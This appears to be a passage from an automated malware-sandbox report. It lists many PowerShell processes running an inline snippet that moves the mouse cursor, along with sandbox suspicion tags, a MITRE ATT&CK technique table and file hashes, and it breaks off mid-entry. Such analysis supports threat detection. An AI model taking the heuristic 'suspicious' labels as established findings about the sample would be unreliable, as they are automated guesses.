  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1800
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2060
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4848
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:428
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3860
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4236
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3680
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:700
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5064
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1220
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4116
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2252
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4332
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2728
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3244
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5000
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2908
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:952
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5464
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5580
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:5740
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:5980
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:5640
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:6160
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:6448
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:6840
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:6496
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:6924
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:7032
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:6912
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:7684
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:8160
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:7316
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:7344
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:7472
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:7716
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:7928
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:6872
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:7624
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:5312
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:4856
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:8228
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:8484
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:8512
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:8808
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:8916
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:9152
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:8308
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:8744
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:9012
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:9208
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:9204
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:9300
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:9540
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:9736
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:9916
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:10028
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:10116
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-Command { Add-Type @" using System; using System.Runtime.InteropServices; public class CursorPosition {[DllImport("user32.dll")]; public static extern bool SetCursorPos(int X, int Y);}"@ }; [CursorPosition]::SetCursorPos(100, 100);
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4924

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3112

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4996

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1408

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
917B

MD5
36a45c13eec2b566a21f77060fdb66f0

SHA1
e16f0e4f65b0a72ec3d7edbab334d5295793afe2

SHA256
3a84add3c70e81340d839dc51de8625610fbc0cd236fac1c3ac89e8eec6f3075

SHA512
6b96f6093b4c27effc5ae6d5a87c6bbffa78c70b70916c72744dacd540ab6629299ba5e53c2bcdd019cebb7f3d3b9c6664df6fcf5e87c2cf016fb1679d8fa04a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d8476e4c8ac1b8c641bff39a5d7bf88b

SHA1
3579ad47f680e5c81b4450d7462af9fcfbafe72f

SHA256
d286364e8304d549474e16d5307f09d2eaf0c860982b4c917ad8f7f0b8404481

SHA512
e86fb263a5bc2d6d286ec93a9fe7e34c3c30aca5085045c6c642079779221dd1ca45893e7b66256b14d4f5ad72974afcd1fe8a424a666cac3243403056cfaa11

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
78217806371455af50d77fedee3fea0c

SHA1
8cbd2b404ffa157322f8c0145c35788d0702ff7e

SHA256
724b803469b551d565e9c65eec2cf75c077505b3f56edd58e08c27a526026d7d

SHA512
e576a1b81cbf0ce14850d5e582f69ffec24812a2ecdd2d48f23ee358469bcdaf30c6248e01789f020159b858754e56e18ea17c7039fc40747f47d9cb50e40d1f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
6e48d487485ecc7d5f677f7aa07a6af8

SHA1
